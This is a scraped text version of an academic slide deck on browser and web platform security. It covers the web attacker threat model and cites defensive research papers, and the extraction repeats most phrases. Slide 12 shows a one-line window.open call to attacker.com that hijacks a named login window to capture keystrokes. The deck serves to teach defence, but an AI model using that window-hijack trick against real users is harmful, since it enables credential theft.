Securing the Web Platform Securing the Web Platform Collin Jackson - - PowerPoint PPT Presentation

securing the web platform securing the web platform
SMART_READER_LITE
LIVE PREVIEW

Securing the Web Platform Securing the Web Platform Collin Jackson - - PowerPoint PPT Presentation

Securing the Web Platform Securing the Web Platform Collin Jackson Stanford University The Web Platform The Web Platform Dynamic Ubiquitous Dynamic Ubiquitous Interactive Instant updates Interactive Instant updates Pages Web Applications


slide-1
SLIDE 1

Securing the Web Platform Securing the Web Platform

Collin Jackson

Stanford University

slide-2
SLIDE 2

The Web Platform The Web Platform

Pages Pages Web Applications Web Applications Programs Programs Dynamic Dynamic Interactive Interactive Ubiquitous Ubiquitous Instant updates Instant updates

slide-3
SLIDE 3

The Web in 1996 The Web in 1996

  • A security policy is born

A security policy is born

  • One page, one principal

One page, one principal

slide-4
SLIDE 4

The Web in 2009 The Web in 2009

  • Many tabs

Many tabs

  • Many sources of content

Many sources of content

  • Concurrent sessions

Concurrent sessions

slide-5
SLIDE 5

Meet the Web Attacker Meet the Web Attacker

A server with an introduction A server with an introduction

slide-6
SLIDE 6

Non Non‐ ‐Assumption Assumption

"The user is confused" "The user is confused"

Collin Jackson, Dan Simon, Collin Jackson, Dan Simon, Desney Desney Tan, and Adam Barth. Tan, and Adam Barth. An Evaluation of Extended Validation and Picture An Evaluation of Extended Validation and Picture‐ ‐in in‐ ‐ Picture Phishing Attacks (USEC 2007) Picture Phishing Attacks (USEC 2007) Blake Ross, Collin Jackson, Nick Miyake, Dan Blake Ross, Collin Jackson, Nick Miyake, Dan Boneh Boneh, and , and John C. Mitchell. Stronger Password Authentication Using John C. Mitchell. Stronger Password Authentication Using Browser Extensions (USENIX Security 2005) Browser Extensions (USENIX Security 2005)

slide-7
SLIDE 7

The Web Attacker wants: The Web Attacker wants:

  • Your pixels

Your pixels

  • Your keystrokes

Your keystrokes

  • Your messages

Your messages

  • Your session

Your session

  • Your browsing history

Your browsing history

  • Your IP address

Your IP address

slide-8
SLIDE 8

A blacklist approach? A blacklist approach?

slide-9
SLIDE 9

Servers are cheap Servers are cheap

  • Domain and hosting: $10

Domain and hosting: $10

  • Domain

Domain‐ ‐validated HTTPS: $0 validated HTTPS: $0

  • Targeted introductions $1 per 2000

Targeted introductions $1 per 2000

slide-10
SLIDE 10

Value of an introduction Value of an introduction

slide-11
SLIDE 11

Leveraging the Introduction Leveraging the Introduction

  • Your pixels

Your pixels

  • Your keystrokes

Your keystrokes

  • Your messages

Your messages

  • Your session

Your session

  • Your browsing history

Your browsing history

  • Your IP address

Your IP address

Adam Barth, Collin Jackson, and John C. Mitchell. Securing Adam Barth, Collin Jackson, and John C. Mitchell. Securing Browser Frame Communication. (USENIX Security 2008) Browser Frame Communication. (USENIX Security 2008) Helen J. Wang, Helen J. Wang, Xiaofeng Xiaofeng Fan, Jon Howell, and Collin Fan, Jon Howell, and Collin

  • Jackson. Protection and Communication Abstractions for
  • Jackson. Protection and Communication Abstractions for

Web Browsers in Web Browsers in MashupOS

  • MashupOS. (SOSP 2007)

. (SOSP 2007) Collin Jackson and Helen J. Wang. Subspace: Secure Cross Collin Jackson and Helen J. Wang. Subspace: Secure Cross‐ ‐ Domain Communication for Web Domain Communication for Web Mashups Mashups (WWW 2007) (WWW 2007) Adam Barth, Collin Jackson, and John C. Mitchell. Robust Adam Barth, Collin Jackson, and John C. Mitchell. Robust Defenses for Cross Defenses for Cross‐ ‐Site Request Forgery (CCS 2008) Site Request Forgery (CCS 2008) Collin Jackson, Andrew Collin Jackson, Andrew Bortz Bortz, Dan , Dan Boneh Boneh, and John C. Mitchell. , and John C. Mitchell. Protecting Browser State from Web Privacy Attacks (WWW Protecting Browser State from Web Privacy Attacks (WWW 2006) 2006) Collin Jackson, Adam Barth, Andrew Collin Jackson, Adam Barth, Andrew Bortz Bortz, , Weidong Weidong Shao Shao, , and Dan and Dan Boneh

  • Boneh. Protecting Browsers from DNS Rebinding

. Protecting Browsers from DNS Rebinding Attacks (CCS 2007) Attacks (CCS 2007)

slide-12
SLIDE 12

12 12

Web Attacker vs. Keystrokes Web Attacker vs. Keystrokes

awglogin awglogin

window.open("https://attacker.com/", "awglogin"); window.open("https://attacker.com window.open("https://attacker.com/", " /", "awglogin awglogin"); ");

Adoption: Adoption:

slide-13
SLIDE 13

Web Attacker vs. Messages Web Attacker vs. Messages

  • Could hijack frames and

Could hijack frames and read their secret messages read their secret messages

  • Proposed a revised

Proposed a revised protocol protocol

  • Adoption:

Adoption:

slide-14
SLIDE 14

Web Attacker vs. Sessions Web Attacker vs. Sessions

slide-15
SLIDE 15

Understanding Understanding Referer Referer Privacy Privacy

slide-16
SLIDE 16

Stronger Threat Models Stronger Threat Models

  • Network attacker

Network attacker

  • Malware containment

Malware containment

Collin Jackson and Adam Barth. Collin Jackson and Adam Barth. Beware of Finer Beware of Finer‐ ‐Grained Origins (W2SP 2008) Grained Origins (W2SP 2008) Collin Jackson and Adam Barth. Collin Jackson and Adam Barth. ForceHTTPS ForceHTTPS Cookies: A Cookies: A Defense Against Eavesdropping and Defense Against Eavesdropping and Pharming Pharming (WWW 2008) (WWW 2008) Adam Barth, Collin Jackson, Charles Reis, and the Google Adam Barth, Collin Jackson, Charles Reis, and the Google Chrome Team. The Security Architecture of the Chromium Chrome Team. The Security Architecture of the Chromium Browser (Tech Report) Browser (Tech Report) Collin Jackson, Dan Collin Jackson, Dan Boneh Boneh, and John C. Mitchell. Transaction , and John C. Mitchell. Transaction Generators: Generators: Rootkits Rootkits for the Web ( for the Web (HotSec HotSec 2007) 2007)

slide-17
SLIDE 17

The Web in 2019 The Web in 2019

  • Cheaper introductions

Cheaper introductions

  • Less confusing authentication

Less confusing authentication

  • Different problems, same Web Attacker

Different problems, same Web Attacker

slide-18
SLIDE 18

http:// http://www.collinjackson.com www.collinjackson.com/ /